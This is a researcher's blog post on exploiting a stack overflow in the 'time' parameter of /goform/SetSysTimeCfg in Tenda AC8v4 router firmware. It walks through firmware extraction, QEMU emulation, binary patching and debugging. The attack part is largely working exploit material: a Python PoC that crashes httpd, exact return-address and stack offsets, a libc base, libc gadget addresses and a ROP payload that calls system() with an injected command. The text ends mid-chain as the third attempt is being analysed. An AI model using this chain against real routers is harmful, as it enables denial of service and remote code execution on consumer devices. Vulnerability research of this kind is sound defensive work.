ROPing Routers from scratch: Step-by-step Tenda Ac8v4 Mips 0day Flow-control ROP -> RCE


Patrick Peng

June 12, 2024


Recently, my passion for binary exploitation was rekindled after learning some fun new stuff about CEs and DLLs. I am not sure why, but I have always been obsessed with assembly, call stacks, glibc heaps and that kind of stuff. So I decided to look back at a batch of 0-days I found earlier and try to turn them into RCEs with some fun gadgets (controlling the flow always makes me feel satisfied).

/bin/httpd: Service or Sink

The exploitation starts with the latest tenda.com firmware for its popular Ac8v4 router, which can be fetched from Tenda's official firmware download page (https://www.tenda.com.cn/download/detail-3518.html). After unzipping the firmware, you should see something similar to this: one .docx guide on installing the firmware and a mysterious .bin file:

 🐈 V16.03.34.06 tree
    ├── AC8V4 xxxx.docx
    └── US_AC8V4.0si_V16.03.34.06_cn_TDC01.bin

Here the US_AC8V4.0si_V16.03.34.06_cn_TDC01.bin file is the firmware image of the Ac8v4! After extracting it with binwalk -Me (with squashfs support installed), we can see the entire router file system under squashfs-root:

 🐈 squashfs-root tree -L 1    
    ├── .....
    ├── etc -> /dev/null
    ├── init -> bin/busybox
    ├── lib
    ├── mnt
    ├── proc
    ├── root -> /dev/null
    ├── sbin
    └── .....

As we can see here, the Ac8v4 firmware has the same layout as a normal Linux-like file system, with directories such as /root, /proc, /bin and /etc at its root. Also note that some of these paths point to /dev/null, which will need a bit of technique when it comes to emulating the firmware :) Looking through the binaries, I found a suspicious one, httpd, which is considerably large; large enough that we can assume it is the main service of the firmware:

Loading the binary into IDA, we can see a huge list of integrated APIs, such as websPageOpen and sslFreeConnection, along with unnamed functions such as sub_4222DC and sub_495368. But how can we find possible vulnerabilities among so many? Well, the magic is source-to-sink analysis: we narrow down the sinks by following websGetVar, the function that reads remotely sent request data into the hosting binary.

After a while of source-to-sinking and thinking, we located a suspicious function, sub_4A79EC, which seems to handle requests to /goform/SetSysTimeCfg, from the call chain sub_4A79EC -> fromSetSysTime -> formDefineTendDa, where formDefineTendDa defines all the web form handlers:

int __fastcall sub_4A79EC(int a1)
  s = (char *)websGetVar(a1, "time", &unk_4F09E0);
  sscanf(s, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", v6, v8, v10, v12, v14, v16);
  v18.tm_year = atoi((const char *)v6) - 0x76C;
  v18.tm_mon = atoi((const char *)v8) - 1;

As introduced, websGetVar reads the "time" parameter from the web form at /goform/SetSysTimeCfg; the resulting s is passed straight into sscanf and split into stack-based buffers such as v6 and v8. This is extremely dangerous because of how sscanf works:

The sscanf() function reads data from buffer into the locations given by argument-list. If the strings pointed to by buffer and format-string overlap, behavior is undefined.

Each entry in the argument list must be a pointer to a variable of a type that matches the corresponding conversion specification in format-string. If the types do not match, the results are undefined.

The format-string controls the interpretation of the argument list. The format-string can contain multibyte characters beginning and ending in the initial shift state.

What sscanf() actually does is match its first argument against the format string and save the pieces into the given variables. In our case, s is the time parameter returned by (char *)websGetVar(a1, "time", &unk_4F09E0);, and sscanf splits it with the format %[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s (a chain of scansets rather than a real regex). The input is expected to look like data1-data2-data3 data4:data5:data6, and the pieces land in v6, v8, v10 and so on. None of the conversions specifies a maximum field width and all of these buffers live on the stack, so an overlong piece simply runs past its buffer, which makes this even more dangerous.
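To make the splitting concrete, here is a minimal Python sketch that mimics the format with regular expressions. It only approximates sscanf() (the helper name split_time and the sample inputs are made up for illustration), but it shows the important part: no field has a length limit, so a piece is copied in full no matter how long it is.

```python
import re

# Rough per-field equivalents of "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s".
# Assumption: this is an approximation, not a full sscanf() implementation.
FIELD_PATTERNS = [r"([^-]+)", r"-([^-]+)", r"-([^ ]+)", r" ([^:]+)", r":([^:]+)", r":(\S+)"]

def split_time(value: str) -> list[str]:
    """Return the fields that would be stored, in order (v6, v8, v10, ...)."""
    fields, pos = [], 0
    for pattern in FIELD_PATTERNS:
        match = re.compile(pattern).match(value, pos)
        if match is None:
            break  # like sscanf(): stop at the first conversion that fails
        fields.append(match.group(1))
        pos = match.end()
    return fields

print(split_time("2024-06-12 10:30:00"))  # ['2024', '06', '12', '10', '30', '00']
print(len(split_time("A" * 500)[0]))      # 500: the whole input lands in the first buffer
```

With no '-' in the input, the first %[^-] swallows everything, which is exactly the situation an overlong time value creates.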

Mipsel is the best!

readelf -h tells us this binary is built for little-endian MIPS (mipsel). To actually ROP on this architecture, we need to know how its instructions work beyond what the cheat sheet says, and figure out how to run the binary in a virtual machine. To begin with, the registers work like this:

  • "$a0" – "$a3": Parameters for function calls. If there are more than 4 parameters, the extra ones are passed via the stack.

  • "$t0" – "$t7": Temporary registers.

  • "$s0" – "$s7": Saved registers. When using them, you need to save the registers you use to the stack.

  • "$gp": Global pointer, used to access data within a 32K range.

  • "$sp": Stack pointer, points to the top of the stack.

  • "$fp": Frame pointer.

  • "$ra": Stores the return address.

As you noticed, MIPS does not have a $bp register; all stack-based operations are implemented via $sp. Additionally, MIPS distinguishes leaf and non-leaf functions, which matters for how $ra behaves: a leaf function calls no other function, so its return address can stay in $ra, while a non-leaf function calls other functions and therefore has to save $ra on the stack and restore it before returning. In our case we don't need to focus on that too much! Furthermore, MIPS supports lots of immediate operations such as addiu; if you are not familiar with them, I recommend checking the cheat sheet, which will help a lot in our ROP part!

QEMU + Patching: Brain simulation (things I spend 2 days in)

Before we start: do not use WSL2 / WSL for this task, because I promise you the network pre-setup won't work (just like running Steam on an ARM MacBook). Using an Ubuntu 22.04 VM in VMware can save you tons and tons of time.

QEMU is an emulator that performs hardware virtualization. It is a hosted virtual machine monitor: it emulates the machine's processor through dynamic binary translation and provides a set of different hardware and device models for the machine, enabling it to run a variety of operating systems. QEMU can run without a host kernel driver and yet gives acceptable performance, thanks to dynamic translation. It supports a variety of target architectures, including but not limited to x86, ARM, MIPS, PowerPC, and SPARC, which makes it a versatile tool for developing, testing, or simply running software for different architectures.

To run the mipsel Tenda Ac8v4 image in an environment identical to the router without buying one (I bought one, but it was still shipping as I wrote this), we will use QEMU as our multi-arch VM for mipsel. QEMU supports different levels of emulation depending on your case: qemu-xxx-static lets you run a single cross-arch binary on its own, while qemu-system-xxx lets you run an entire system. In our case qemu-system works best, since we have to deal with all these dynamically linked binaries and stuff; it does take more effort to set up, though.

To begin with, there is a bit of network configuration to handle first; communication between QEMU and your host always causes lots of headaches. For us, we will build a tun/tap device: the QEMU virtual machine reads and writes /dev/net/tun as a file descriptor and uses the tap0 network interface to interact with the host's protocol stack (which requires a bridge br0 on your host).

apt-get install bridge-utils
apt-get install uml-utilities

ifconfig ens33 down                   # ens33 : switch it to your local interface
brctl addbr br0                          # Adding br0
brctl addif br0 ens33                 # Linking to br0
brctl stp br0 on                    # On stp
brctl setfd br0 2                    # forward delay
brctl sethello br0 1                # Hello time
ifconfig br0 promisc up        # enable br0
ifconfig ens33 promisc up    # enable local interface
dhclient br0                        # obtain br0's IP via dhclient

brctl show br0                        # ls br0
brctl showstp br0                    # show info of br0

tunctl -t tap0                        # add tap0
brctl addif br0 tap0                # link to br0
ifconfig tap0 promisc up    # enable tap0
ifconfig tap0 192.168.x.x/24 up        # assign an ip for tap0 (x in subnet)

brctl showstp br0                    # show br0's interface

If you check br0 now, tap0 will show as disabled; it turns into forwarding after we start qemu-system. Furthermore, br0, tap0 and your local interface should all be in the same subnet. Moving on to qemu-system-mipsel, we need to download the Debian mipsel image and kernels from people.debian.org:

wget https://people.debian.org/~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2
wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-2.6.32-5-4kc-malta
wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta

After that, we can start our qemu-system-mipsel emulation like this!

sudo qemu-system-mipsel \
    -M malta \
    -kernel vmlinux-3.2.0-4-4kc-malta \
    -append "nokaslr root=/dev/sda1" \
    -hda debian_wheezy_mipsel_standard.qcow2 \
    -net nic -net tap,ifname=tap0,script=no,downscript=no

The -net nic option tells QEMU to create a virtual network card in the virtual machine. The -net tap option specifies that the connection type is TAP, and ifname specifies the host interface name (the tap0 created earlier, which essentially connects the QEMU virtual machine to the bridge). The script and downscript options tell QEMU which scripts to call to configure the network when the VM starts and stops. If they are omitted, QEMU calls the default scripts /etc/qemu-ifup and /etc/qemu-ifdown, and if ifname is omitted, an interface name is picked automatically. Since we have already configured everything ourselves, we set both script options to no.

After boot (the default username and password are both root), eth0 is not assigned an IP address automatically; we can assign one manually with ifconfig eth0 192.168.x.x/24 up (change x to a free address in your subnet). Now upload the binwalk-extracted squashfs file system with scp and unpack it at /root. Make sure to mount /dev and /proc into the file system via mount -o bind /dev /root/dev && mount -t proc /proc /root/proc, then chroot /root sh to get into the file system root of the Tenda Ac8v4.

Now if you run the vulnerable ./bin/httpd, you may hit two issues. The first one complains that some libc files and symbols cannot be found, which is easily fixed by adding the library directory to the environment via export LD_LIBRARY_PATH=/lib:$LD_LIBRARY_PATH. The second one requires more tricks: after setting LD_LIBRARY_PATH correctly the program starts to run, but you may notice something very weird: it gets stuck after printing Welcome to ..., without any message about binding to a network address.

Well, if you search for the string 'Welcome' in IDA and follow its cross-reference, it takes you to main(), and the cause turns out to be ifaddrs_get_ifip() (you should see something similar to this):

  puts("\n\nYes:\n\n      ****** WeLoveLinux****** \n\n ****** Welcome to ******");
  while ( 1 )
    lan_ifname = ifaddrs_get_lan_ifname();
    if ( ifaddrs_get_ifip(lan_ifname, v10) >= 0 )

The reason it gets stuck is that ./bin/httpd runs a bunch of networking routines in this loop to make sure the router is in a good state. These are never really necessary for us, so we can simply bypass the check by patching the return value of ifaddrs_get_ifip in the assembly, or more easily, by jumping to loc_43B798 unconditionally:

.text:0043B768                 lw      $gp, 0x6B8+var_6A8($fp)
.text:0043B76C                 bgez    $v0, loc_43B798  # <- j loc_43B798
.text:0043B770                 nop

If you don't enjoy opening IDA Pro, no worries! You can download the patched version here -> github.com. After replacing the original ./bin/httpd the program continues, but other issues start to manifest: when picking the listening address, httpd might say 'unable to assign address' or listen on an unexpected address! How did this happen? If you search for the string 'httpd listen ip', it takes you to socketOpenConnection() and back to main():

  v4 = ifaddrs_get_lan_ifname();
  if ( ifaddrs_get_ifip(v4, v11) < 0 )
    GetValue("lan.ip", v8);
    strcpy(g_lan_ip, v8);
    memset(v12, 0, 0x5E4u);
    if ( !file_lan_dhcpc_get_ipinfo_and_status(v12) && v12[0x8C] )
      strcpy(g_lan_ip, &v12[0x8C]);

When ifaddrs_get_ifip() fails, the global variable g_lan_ip falls back to the lan.ip configuration value (or to the DHCP client info), while normally it holds the IP of interface br0. In our case we don't have a br0 bridge interface inside the QEMU guest (we only have one on the Ubuntu VMware host), so we have to create one in the same way as in the pre-QEMU setup, using brctl and ifconfig; this time we assign the address manually instead of using dhclient:

brctl addbr br0                        # adding br0 interface
ifconfig br0 192.168.x.x/24 up        # manually assigning an IP address

Boom! Now re-run ./bin/httpd after exporting LD_LIBRARY_PATH, patching the ifaddrs_get_ifip() check and building a br0 interface. Finally it binds to the right IP and port, as the httpd - web.c:158 debugging message shows, and we can open it directly in our browser and see the Tenda Ac8v4's index page!

$a0+$t9: Overflow and Flow-control


After setting up the qemu-system emulation for the Tenda Ac8v4, it is time to put it into practice! But before we start, serving a gdbserver for ./bin/httpd helps a lot. First, fetch a prebuilt gdbserver binary from https://github.com/lucyoa/embedded-tools/tree/master/gdbserver, and be sure to pick the one matching the architecture of the QEMU VM; in our case that is gdbserver-7.7.1-mipsel-mips32-v1. After downloading it via wget or scp and running chmod +x on it, use ./gdbserver :[PORT_YOU_WANT] ./bin/httpd to start serving! Also, since we are debugging mipsel, we need gdb-multiarch on the host (apt install gdb-multiarch). After this, you can connect to the server with gdb-multiarch -q ./bin/httpd and then target remote [address]:[port]; make sure you continue once you are connected.

If you encounter errors connecting to the gdbserver, try remounting /proc with mount -t proc /proc /root/proc before you chroot . sh into the firmware :)

After the gdbserver is set up, we can exploit this stack-based overflow at /goform/SetSysTimeCfg as a proof of concept! I created this poc.py script to first test out the overflow:

import requests

def sink(host, port, payload):
    url = f"http://{host}:{port}/goform/SetSysTimeCfg"
    _payload = b'retr0reg' + b":" + payload
    # "time" is the form field that sub_4A79EC reads through websGetVar
    data = {"time": _payload}

    def send_request():
        try:
            requests.post(url=url, data=data)
        except Exception as e:
            print(f"Request failed: {e}")

    send_request()


For our initial payload, we can use pwndbg's integrated cyclic to generate one. After sending a considerably large payload, we can see the program receive a segmentation fault due to an invalid return address. This alone already lets us cause a DoS on ./bin/httpd and halt the router!

At this point, pwndbg's integrated cyclic -l lets us compute the offset inside our data at which the control flow was hijacked. The value that ended up in $pc sits at offset 123, b'bgaa' (0x61616762 when read as a little-endian word), meaning that replacing those four bytes with a pointer lets us steer the control flow to that address. With that as our basis, we can start our advanced ROPing and work toward our final goal: remote code execution.
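If you want to double-check the offset without pwndbg, the lookup can be reproduced in plain Python. The sketch below regenerates the same kind of de Bruijn pattern and searches it; it assumes the default lowercase alphabet and a subsequence length of 4, and the names cyclic and cyclic_find are just local helpers here, not the pwntools functions themselves.

```python
from itertools import islice
import struct

def de_bruijn(alphabet: str, n: int):
    """Yield a de Bruijn sequence in which every n-character window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (lowercase alphabet, n = 4)."""
    return "".join(islice(de_bruijn("abcdefghijklmnopqrstuvwxyz", 4), length)).encode()

def cyclic_find(value: int, length: int = 1024) -> int:
    """Offset of a 32-bit little-endian register value inside the pattern."""
    return cyclic(length).find(struct.pack("<I", value))

print(cyclic(16))               # b'aaaabaaacaaadaaa'
print(cyclic_find(0x61616762))  # 123 (bytes b'bgaa', the hijacked return address)
print(cyclic_find(0x61616862))  # 127 (bytes b'bhaa', where $sp points afterwards)
```

Note that the register shows the four pattern bytes in reverse order because the target is little-endian, which is why the lookup packs the value with "<I" first.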

MIPS ROP: Pointer World

On MIPS, ROP is a different subject compared to the usual ROP we are most familiar with on Intel. MIPS uses a different mechanism for function returns: instead of a ret instruction that pops the return address from the stack, it uses registers and jump instructions, mostly jal/jalr to call and jr $ra to return. Thus in MIPS ROP we cannot simply use gadgets like pop rdi; ret to control the flow of execution, but have to work with registers and the stack slots they are loaded from. This makes ROP harder, since lots of stack pre-setting is required and $sp is raised or lowered between gadgets, which makes it more confusing to pre-plan where gadgets and targets go on the stack.

To begin with, the wonderful mipsrop plugin for IDA Pro lets us scan for usable gadgets for ROP flow control. For more room to work with, we decided to use the lib/libc.so shared library as our gadget library. Since the router is not protected by ASLR (and if it were, we could leak addresses via ROP), we can call gadgets at fixed offsets from a fixed libc_base; in our case, vmmap shows libc.so mapped at 77f59000-77fe5000 r-xp 00000000 08:01 788000, so libc_base is 0x77f59000. Knowing that, we can start looking for gadgets for the flow control.
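If you prefer to pull the base out of /proc/<pid>/maps programmatically rather than reading vmmap by eye, a small parser is enough. This is a sketch: the function name is made up, and the sample text is reconstructed from the mappings quoted in this post (the pathname on the first line and the inode on the second are assumed).

```python
def libc_base_from_maps(maps_text: str, needle: str = "libc") -> int:
    """Return the lowest start address of an executable mapping whose line contains `needle`."""
    starts = []
    for line in maps_text.splitlines():
        parts = line.split()
        # parts[0] is "start-end", parts[1] is the permission string such as "r-xp"
        if len(parts) < 2 or "x" not in parts[1] or needle not in line:
            continue
        start, _end = parts[0].split("-")
        starts.append(int(start, 16))
    if not starts:
        raise ValueError(f"no executable mapping matching {needle!r}")
    return min(starts)

# Sample reconstructed from the vmmap output in this post (pathname/inode columns assumed).
sample = (
    "77f59000-77fe5000 r-xp 00000000 08:01 788000     /lib/libc.so\n"
    "77ff4000-77ff6000 rw-p 0008b000 08:01 788000     /lib/libc.so\n"
)

print(hex(libc_base_from_maps(sample)))  # 0x77f59000
```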

Trial 1: $a0 manipulation

mipsrop provides the mipsrop.system() method for locating gadgets that set $a0 and sit very close to a flow-control gadget. In our case, we found these two in libc.so:

|  Address     |  Action                                              |  Control Jump                          |
|  0x0004D144  |  addiu $a0,$sp,0x24+var_C                            |  jr    0x24+var_s0($sp)                |
|  0x00058920  |  addiu $a0,$sp,0x28+var_C                            |  jr    0x28+var_4($sp)                 |

As shown, both gadgets at 0x0004D144 and 0x00058920 set register $a0 (the first argument register) to an address on the stack relative to $sp (addiu x,y,z means x = y + z) and then jr (jump) to an address loaded from another $sp-relative stack slot. This gives us control over $a0 for parameter passing before we steer the flow into another callee of our choice using stack data we control! For example, with the gadget at 0x0004D144 in libc.so, we first overwrite the return address with libc_base + 0x0004D144, place the data $a0 should point at at offset 0x24+var_C from $sp (this equals 0x24 - 0xC = +0x18), then place the jr target at $sp offset 0x24+var_s0 (0x24+0), creating a stack layout like this:

|     ret_addr     +  gadget 0x4D144 |
|     $sp+0x18     +    $a0_addr     |
|     $sp+0x24     +    jr_addr         |
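Since IDA's 0x24+var_C style notation shows up in every gadget from here on, a tiny helper that turns it into a plain $sp offset saves a lot of mental arithmetic. This is a sketch with a made-up function name; it relies on the naming used above, where var_X sits at -X and var_sX (saved registers) sits at +X.

```python
import re

def resolve_ida_offset(expr: str) -> int:
    """Turn IDA stack notation like '0x24+var_C' into a plain offset from $sp.

    var_X is located at -X, while var_sX (a saved-register slot) is located at +X.
    """
    match = re.fullmatch(r"(0x[0-9A-Fa-f]+)\+var_(s?)([0-9A-Fa-f]+)", expr)
    if match is None:
        raise ValueError(f"unsupported expression: {expr}")
    base = int(match.group(1), 16)
    delta = int(match.group(3), 16)
    return base + delta if match.group(2) else base - delta

for expr in ("0x24+var_C", "0x24+var_s0", "0x28+var_4", "0x1C+var_s18", "0x38+var_s10"):
    print(f"{expr:14} -> $sp+{resolve_ida_offset(expr):#x}")
# 0x24+var_C     -> $sp+0x18
# 0x24+var_s0    -> $sp+0x24
# 0x28+var_4     -> $sp+0x24
# 0x1C+var_s18   -> $sp+0x34
# 0x38+var_s10   -> $sp+0x48
```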

We already know from cyclic that the return address ($pc) sits at offset 123 (b'bgaa', 0x61616762 as a little-endian word), and that $sp points at offset 127 (b'bhaa', 0x61616862). Next we need a target for the ROP chain. Since we already know libc_base for libc.so, we set jr_addr -> libc_base + _system (the libc.so symbol of system) and place the command string at $sp+0x18, which is where $a0 will point when system() is entered. This gives us the first exploit:

    def _rop(ropcmd: RopCmd):

        # 77f59000-77fe5000 r-xp 00000000 08:01 788000 
        libc_base = 0x77f59000

        ret_offset = 0x7b # --> b'bgaa'
        sp_offset  = 0x7f # --> b'bhaa'

        _system = 0x004E630

        a0_EQ_sp24_c_JR_24sp  = 0x0004D144 # addiu $a0,$sp,0x24+var_C | jr 0x24($sp)
        # LOAD:0004D144                 addiu   $a0, $sp, 0x24+var_C
        # LOAD:0004D148                 lw      $ra, 0x24+var_s0($sp)
        # LOAD:0004D14C                 nop
        # LOAD:0004D150                 jr      $ra

        a0_EQ_sp28_c_JR_24sp  = 0x00058920 # addiu $a0,$sp,0x28+var_C | jr 0x24($sp)
        # LOAD:00058920                 addiu   $a0, $sp, 0x28+var_C
        # LOAD:00058924                 lw      $v1, 0x28+var_C($sp)
        # LOAD:00058928                 lw      $ra, 0x28+var_4($sp)
        # LOAD:0005892C                 sw      $v1, 0($s0)
        # LOAD:00058930                 lw      $s0, 0x28+var_8($sp)
        # LOAD:00058934                 jr      $ra

        _payload = {
                ret_offset: libc_base + a0_EQ_sp24_c_JR_24sp,
                (sp_offset + 0x18): b'`mkdir /retr0reg`',
                (sp_offset + 0x24): libc_base + _system,
        }

        return flat(_payload)

Here we construct the ROP payload with pwntools' flat, which avoids tons of 'payload +=' and p32() operations and builds the payload from a dictionary of offsets, together with the libc_base we obtained via vmmap (/proc/<pid>/maps) and the $pc and $sp offsets from the cyclic pattern. This ROP chain should work as follows: $pc becomes libc_base + a0_EQ_sp24_c_JR_24sp, $a0 is set to point at sp_offset + 0x18 where our RCE command is stored, and then we jr into system() at libc_base + _system. Now we can send the flattened _payload through our sink() and let's see what happens...

Well, ./bin/httpd received SIGSEGV at 0x77fa7640, just a few instructions past libc_base + _system (0x77fa7630). On one hand this is a good sign: we did steer the flow to the system symbol loaded from libc.so, and $a0 was indeed set to a stack address pointing at 0x646b6d60 (the first bytes of our command). On the other hand, system itself did not get far: it stopped at 0x77fa7640, where lw $t9, -0x7f90($gp) caused the SIGSEGV. But why?
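The numbers in the crash can be sanity-checked with a few lines of Python; the variable names are just for this sketch, the values are the ones quoted above.

```python
import struct

libc_base = 0x77f59000
system_offset = 0x4E630
fault_pc = 0x77fa7640

# Where system() is mapped, and how far into it the crash happened.
system_addr = libc_base + system_offset
print(hex(system_addr))             # 0x77fa7630
print(hex(fault_pc - system_addr))  # 0x10, i.e. the instruction at LOAD:0004E640

# The word $a0 points at, decoded as little-endian bytes.
print(struct.pack("<I", 0x646b6d60))  # b'`mkd', the start of `mkdir /retr0reg`
```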

The answer is hidden in the faulting instruction, lw $t9, -0x7f90($gp), which loads a word (lw) from offset -0x7f90 relative to the global pointer register $gp. This is how libc normally looks up other symbols called from the current function; for example, if you check libc.so in IDA Pro, you will find that this instruction loads memset from the global symbols. However, because we jumped here straight from our overflow, $gp was not set up properly, causing the CPU to access an illegal address, 0x7800f34c, which does not belong to any segment in vmmap, and that triggers the SIGSEGV.

Trial 2: $a0 + $t9?

To solve this, we have to find a way to make $gp-0x7f90 a legit address, ideally the exact address pointing to the symbol memset in the loaded libc. And here comes something fun: if you look at where system() begins, around 0x004E630, you will find this segment, which tells you where $gp comes from.

LOAD:0004E630                 li      $gp, (unk_9C2D0+0x7FF0 - .)
LOAD:0004E638                 addu    $gp, $t9
LOAD:0004E63C                 addiu   $sp, -0x450
LOAD:0004E640                 la      $t9, memset

Unfortunately, the li instruction rules out modifying $gp directly via ROP before calling system(), since $gp is loaded with the immediate value (unk_9C2D0+0x7FF0 - .). Nevertheless, reading on, you will find addu $gp, $t9, which tells us the actual culprit is register $t9. This is both good news and bad news. On one hand, while it is nearly impossible to find a gadget that sets $gp from a stack value and then jumps to another stack-controlled address, since $gp is hardly ever loaded from the stack at all, finding one for $t9 is much easier. On the other hand, we might need to construct a brand-new ROP chain for the exploitation.

But before designing a chain modifying the $t9 register, it will be the best to check what value will be appropriate for $t9:

By setting a breakpoint at 0x77f59000+0x004E630 (system()), we can see that no matter which command is passed in $a0, $t9 is always set to this magic address, 0x77fa7630, which is exactly the first instruction of system(); this also makes -0x7f90($gp) in lw $t9, -0x7f90($gp) a legit address inside the memory mapped for libc.so -> 0x77ff4000 0x77ff6000 rw-p 2000 8b000 /lib/libc.so. Now it's time to construct a ROP chain that sets $t9 while still letting us set $a0 arbitrarily and jump to the loaded system() in libc.
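The relationship between $t9 and $gp can be worked out by hand from the prologue. The sketch below does the arithmetic, assuming that the "." in (unk_9C2D0+0x7FF0 - .) stands for the address of the li instruction itself (0x4E630); the function and constant names are made up for illustration.

```python
def gp_after_prologue(t9: int, gp_disp: int) -> int:
    """$gp after `li $gp, gp_disp` followed by `addu $gp, $t9` (32-bit wraparound)."""
    return (gp_disp + t9) & 0xFFFFFFFF

# (unk_9C2D0 + 0x7FF0 - .), assuming "." is the address of the li at 0x4E630
GP_DISP = 0x9C2D0 + 0x7FF0 - 0x4E630

t9 = 0x77f59000 + 0x4E630  # libc_base + system, the value seen in $t9 on a normal call
gp = gp_after_prologue(t9, GP_DISP)
slot = gp - 0x7F90         # address read by lw $t9, -0x7f90($gp)

print(hex(GP_DISP))                     # 0x55c90
print(hex(gp))                          # 0x77ffd2c0
print(hex(slot))                        # 0x77ff5330
print(0x77ff4000 <= slot < 0x77ff6000)  # True: inside the rw-p libc.so mapping
```

With the correct $t9 the load lands inside the writable libc.so mapping, which matches what the breakpoint shows; with any other $t9 the whole window shifts by the same amount.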

The million-dollar question is: how can we control $t9 while still being able to jump to our previous $a0 get-shell gadget afterwards? This requires another round of mipsrop-ing. Searching for move $t9, we find loads of gadgets that fit our expectation for setting $t9, either directly or indirectly via other registers:

Python>mipsrop.find('move $t9')
|  Address     |  Action                                              |  Control Jump                          |
# tons of identical gadgets at different addresses in libc.so.....
|  0x0006D970  |  move $t9,$s4                                        |  jr    $s4                             |
|  0x0006EFA0  |  move $t9,$s3                                        |  jalr  $s3                             |
|  0x0006EFD0  |  move $t9,$s3                                        |  jalr  $s3                             |
|  0x00070E14  |  move $t9,$s2                                        |  jalr  $s2                             |
|  0x00072E00  |  move $t9,$s3                                        |  jalr  $s3                             |
|  0x00075474  |  move $t9,$v0                                        |  jr    $v0                             |
|  0x00078190  |  move $t9,$s1                                        |  jalr  $s1                             |
|  0x000783D0  |  move $t9,$s1                                        |  jalr  $s1                             |
|  0x000784DC  |  move $t9,$s1                                        |  jalr  $s1                             |
|  0x0007A19C  |  move $t9,$t1                                        |  jalr  $t1                             |
|  0x0007A1B4  |  move $t9,$t0                                        |  jalr  $t0                             |
|  0x0007EA1C  |  move $t9,$t0                                        |  jalr  $t0                             |
|  0x0007EBD8  |  move $t9,$s2                                        |  jalr  $s2                             |
|  0x0001B014  |  move $t9,$s4                                        |  jr    0x1C+var_s18($sp)               |

However, we also need to be able to jump to another gadget placed on the stack, namely the $a0 setter and stack-caller, and only the 0x0001B014 gadget meets that requirement! It first moves $s4 into $t9, then jumps to the address stored at 0x1C+var_s18($sp) ($sp + 0x1C + 0x18), where we will store the previous a0_EQ_sp24_c_JR_24sp.
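The selection rule is simple enough to express in code: keep only the gadgets whose jump target is loaded from a stack slot rather than taken from a register. The sketch below applies it to a few rows copied from the mipsrop output above; the tuple layout and function name are made up for illustration.

```python
# (address, action, control jump) rows copied from the mipsrop output above
GADGETS = [
    (0x0006D970, "move $t9,$s4", "jr    $s4"),
    (0x00075474, "move $t9,$v0", "jr    $v0"),
    (0x0007A1B4, "move $t9,$t0", "jalr  $t0"),
    (0x0001B014, "move $t9,$s4", "jr    0x1C+var_s18($sp)"),
]

def stack_controlled(gadgets):
    """Keep gadgets whose jump target comes from the stack, i.e. the jump operand ends in ($sp)."""
    return [g for g in gadgets if g[2].rstrip().endswith("($sp)")]

for address, action, jump in stack_controlled(GADGETS):
    print(f"{address:#010x}  {action}  |  {jump}")
# 0x0001b014  move $t9,$s4  |  jr    0x1C+var_s18($sp)
```

A gadget ending in jr $s4 would jump straight to the value we just put into $t9, so only a stack-controlled jump leaves us free to chain into the $a0 gadget afterwards.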

We also need a way to set $s4 before the gadget at 0x0001B014 is triggered. This is a relatively easy job, since $s4 is a pretty common intermediate register in stack-controlling gadgets; we again use mipsrop.find(), this time as mipsrop.find('.* $s4'), to match gadgets that operate on $s4:

Python>mipsrop.find('.* $s4')
|  Address     |  Action                                              |  Control Jump                          |
# 70 lines that fits our requirement....
|  0x0007E8C8  |  lw $s4,0x38+var_s10($sp)                            |  jr    0x5C($sp)                       |
|  0x0007EB5C  |  lw $s4,0x44+var_s10($sp)                            |  jr    0x5C($sp)                       |

This time mipsrop.find returns loads of gadgets! Fortunately, they all end in a stack-controlled jump such as jr 0x5C($sp) and let us load $s4 from a stack slot such as 0x38+var_s10($sp). So we simply choose the one that looks nice and leaves more room on the stack, with less chance of the two stack slots colliding: compared to 0x0007EB5C, 0x0007E8C8 leaves us an extra (0x44+0x10)-(0x38+0x10)=0xC bytes between the $s4 slot and the jump slot (which doesn't really matter that much for $s4).

Now that we can control $t9 via $s4, which is loaded from 0x38+var_s10($sp) by gadget0 (reached via ret_addr), we can make the jr address of move $t9,$s4; jr 0x1C+var_s18($sp) point at the gadget addiu $a0,$sp,0x24+var_C, which sets $a0 to $sp+0x24-0xC and then jumps to the address stored at 0x24+var_s0($sp).

As now, we can construct payload as:

+------offset------+------value---------------------------------------+ <|-- g0
|     ret_addr     |  lw $s4,0x38+var_s10($sp) + jr 0x5C($sp)         | ---
|------------------+--------------------------------------------------|   |
|     $sp+0x24     |  libc_base + system()                            |   |
|------------------+--------------------------------------------------|   | g1
|     $sp+0x30     |  command_for_$a0                                 |   |
|     $sp+0x34     |  addiu $a0,$sp,0x24+var_C + jr 0x24+var_s0($sp)  |   |  |
|------------------+--------------------------------------------------|   |  |
|     $sp+0x48     |  #s4_content                                     |   |  | g2
+------------------+--------------------------------------------------|<|-|  |
|     $sp+0x5C     |  move $t9,$s4 + jr 0x1C+var_s18($sp)             |-------

Trial 3: The Evil $sp

Now, if we simply lay out all these gadgets and their data on the stack using the sp_offset that we obtained previously via cyclic, you will find something very interesting: it doesn't work at all! But why? Let's dig back into the gadgets we collected. Take the first gadget, the one our return address points at directly: besides the lw $s4,0x38+var_s10($sp); jr 0x5C($sp) part we have all seen, there is actually a hidden part.

IDA lets us examine the instructions at a given address by simply double-clicking the address itself. In our case, double-clicking one of these gadgets, here the 0x0007EB5C sibling of 0x0007E8C8, takes us to this:

LOAD:0007EB5C loc_7EB5C:
LOAD:0007EB5C                 lw      $ra, 0x44+var_s18($sp)
LOAD:0007EB60                 lw      $s5, 0x44+var_s14($sp)
LOAD:0007EB64                 lw      $s4, 0x44+var_s10($sp)
LOAD:0007EB68                 lw      $s3, 0x44+var_sC($sp)
LOAD:0007EB6C                 lw      $s2, 0x44+var_s8($sp)
LOAD:0007EB70                 lw      $s1, 0x44+var_s4($sp)
LOAD:0007EB74                 lw      $s0, 0x44+var_s0($sp)
LOAD:0007EB78                 jr      $ra
LOAD:0007EB7C                 addiu   $sp, 0x60

